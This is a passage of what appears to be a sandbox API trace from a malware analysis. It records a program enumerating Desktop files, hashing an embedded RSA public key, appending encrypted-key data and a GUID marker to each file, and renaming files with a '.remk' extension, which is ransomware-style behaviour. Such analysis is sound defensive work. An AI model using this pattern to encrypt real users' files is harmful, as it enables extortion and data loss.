ftLastWriteTime.dwLowDateTime=0x8fa5ec40, ftLastWriteTime.dwHighDateTime=0x1d5db9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iIWj9EjHStmpO_L", cAlternateFileName="IIWJ9E~1")) returned 1 [0233.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0233.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0233.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37baa38 [0233.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37baab0 [0233.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0233.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0233.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0233.186] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3faa330, ftCreationTime.dwHighDateTime=0x1d5e2ce, ftLastAccessTime.dwLowDateTime=0x24cbb8f0, ftLastAccessTime.dwHighDateTime=0x1d5d84d, ftLastWriteTime.dwLowDateTime=0x24cbb8f0, ftLastWriteTime.dwHighDateTime=0x1d5d84d, nFileSizeHigh=0x0, nFileSizeLow=0xea5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2ptz8I.pptx", cAlternateFileName="J2PTZ8~1.PPT")) returned 1 [0233.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba510 [0233.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.186] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\j2ptz8I.pptx") returned=".pptx" [0233.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\j2ptz8I.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\j2ptz8i.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.189] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=59998) returned 1 [0233.189] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.192] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xea38, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.192] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.194] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.194] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xea5e, lpOverlapped=0x0) returned 1 [0233.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.196] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.196] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.196] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.196] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.197] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.197] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.197] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.197] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.197] GetLastError () returned 0x0 [0233.197] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.197] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.197] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.197] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.197] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.197] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.197] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xea60) returned 0x37c2278 [0233.198] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.198] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.198] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.199] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xea5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.199] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.199] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.199] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.199] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.199] CloseHandle (hObject=0x640) returned 1 [0233.202] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\j2ptz8I.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\j2ptz8i.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\j2ptz8I.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\j2ptz8i.pptx.remk")) returned 1 [0233.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.203] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.205] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e73adb0, ftCreationTime.dwHighDateTime=0x1d5e70d, ftLastAccessTime.dwLowDateTime=0x93013600, ftLastAccessTime.dwHighDateTime=0x1d5daba, ftLastWriteTime.dwLowDateTime=0x93013600, ftLastWriteTime.dwHighDateTime=0x1d5daba, nFileSizeHigh=0x0, nFileSizeLow=0x12d34, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K151dM.swf", cAlternateFileName="")) returned 1 [0233.205] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\K151dM.swf") returned=".swf" [0233.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\K151dM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\k151dm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.206] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=77108) returned 1 [0233.206] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.209] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12d0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.209] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.211] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12d34, lpOverlapped=0x0) returned 1 [0233.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.213] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.214] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.214] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.214] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.214] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.214] GetLastError () returned 0x0 [0233.214] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.214] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.214] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.214] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.215] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12d30) returned 0x37c2278 [0233.215] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb6f0 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb738 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee388 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee418 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.216] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee418 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee3d0 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee3b8 [0233.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee418 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.217] GetCurrentThreadId () returned 0x314 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9bc0 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.218] GetCurrentThreadId () returned 0x314 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee418 [0233.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 